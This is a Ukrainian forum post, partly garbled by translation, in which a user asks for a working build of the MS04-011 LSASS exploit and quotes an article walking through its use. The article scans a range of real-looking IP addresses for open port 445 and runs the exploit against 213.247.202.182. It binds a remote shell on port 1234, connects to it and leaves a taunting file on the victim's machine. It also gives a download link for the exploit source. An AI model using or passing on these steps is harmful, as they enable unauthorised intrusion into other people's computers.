Дуже цікава стаття про використання експлойта автор описав у подробиці але!!! не написав як

у нього зроблений експлойт !!!!!!!

Питання може хто нитка і налаштувати ісходник так що б він відкривав порт 1234 коли отакуешь через

445 порт а то я десь скачав але не на сайті securitylab.ru файл ms04011lsass.rar він лише відкриває 445 коли

порт вже відкрито вообщем пише так !!!!!!!
пишу expl.exe to xxx.xxx.xxx.xxx і порт 1234 у рядку видається типу
справа в тому що я не вмію компілювати файли ((((((

[*]Connecting to 213.247.202.182 445ok! а у автора статті видає порт 1234 ось у чому цвях

[*]Attackingok!

Прочитайте статтю і допоможіть чим можна напешите на пошту [email protected] або на форумі пліз якщо

є налаштований експлойт дайте посилання, пліз!!! за раніше спасибі yhamobi
посилання на експлойт є в статті там ісходник!!!

А ось і сама стаття
Автор:gemagla.b1n

Мета експлоїта: Remote DoS, Remote System
Вплив експлоїта: Windows 2000 sp4, Windows XP sp1
Автор експлоїта: houseofdabus
Опис уразливості: www.securitylab.ru/44490.html
Скачати експлоїт:
www.securitylab.ru/_Exploits/2004/04/04252004.ms04011lsass.rar
У цій статті я буду на реальному прикладі зводити експлоїт і опишу основні моменти використання

уразливості.

Lets begin.

Для початку нам потрібно злити експлоїт.зливаємо.в моєму випадку я закачував сорсы(исходники) і

откомпилировал.

Також знадобиться будь сканер, я буду використовувати ][Spider 6.5.Для мене він є кращим і самм

надійним.

Також обяателен будь telnet-клієнт, я скористався SecureCRT.

Target.

Ось тут нам знадобиться сканер Х-spider.З його допомогою треба знайти мету.Як відомо, на машині повинен бути

відкритий порт 445.Цим і треба скористатися.Я користувався Х-spiderом.Він легкий, не вибагливий до

ресурсів, має зручний інтерфейс, та ще й безкоштовно.=)

Треба знайти цеь… В меню Х-spiderа вибираємо Пошук і вказуємо діапазон IP-адрессом і ставимо умову на

відкритий порт 445.

Ось що показад мені сканер:
— 213.247.202.177
— 213.247.202.178
— 213.247.202.179
— 213.247.202.180
— 213.247.202.181
+ 213.247.202.182
— 213.247.202.183

Бачите +? Значить це машина з відкритим 445 портом! Мета знайдено.Це був тільки перший крок.

Lets attack!

Після того, як мета знайдена, приступаємо до зведення сплоита.Ось як це треба 10делать

Для початку визначимо віддалену ОС.Робимо це так

Запускаємо командного рядка і задаємо шлях до сплоиту..

C:expl.exe
Дивимося на полі Targets.0-ОС ХР. Якщо ми задамо параметр t, то можна визначити віддалену ОС

C:expl.exe 0 213.247.202.182 1234-t

Результат:

Target:IP: 213.247.202.182: OS:Windows Professional [універсальний] lsass.exe

[*] connecting to 213.247.202.182 OK

[*] Detecting remote OS:Windows 5.1

Дивимося вгору.5.1.

Detect remote OS:

Windows 5.1-WinXp

Вісь ми визначили… ХР!

Далі пишемо прсто

C:expl.exe 0 213.247.202.182 1234 (без префікса t)

[*]Connecting to 213.247.202.182 1234ok!

[*]Attackingok!

Ось ми і соверили атаку на машину..

Тепер биндим там порт(я вибрав 1234, як ви бачите)

Знову пишемо:

C:expl.exe 0 213.247.202.182 1234

Повторюється все теж саме, але тепер я забиндил 1234 порт на компі мети.

Тепер коннектимся

Я запускаю PuTTy і на вкладці Session указыва Айпі машини, порт(1234) і коннектюсь по протоколу Raw.

Конектимсяи ми вже в машині Завдання выполненано! Не дарма ж ми намагалися… Треба немнофка пофалить!

Я оставлюя командою echo привіт на компі!

C:>echo прива! Ламер вухатий!gemagla.b1n and Bcteam have you >hello.txt(залишаю послання у файлі hello.txt)

От і все! Я розкрив машини, що залишив повідомлення =)

Що я можу сказати з цього приводу? По-перше експлоїт, приминенный мною, заснований на dcom RPC.Ще Бага

досі актуальна

www.microsoft.com/technet/security/…n/MS04-011.mspx -патч.

В цей раз мені повезлоатака пройшла успішно! Але міг би бути і такий варіант:

Причин цьому може бути декілька:
— завадив запущений Firewall;
— об’єкт атаки опинився пропатчен;
— не підійшла версія операційної системи;
— комп’ютер жертви вийшов з мережі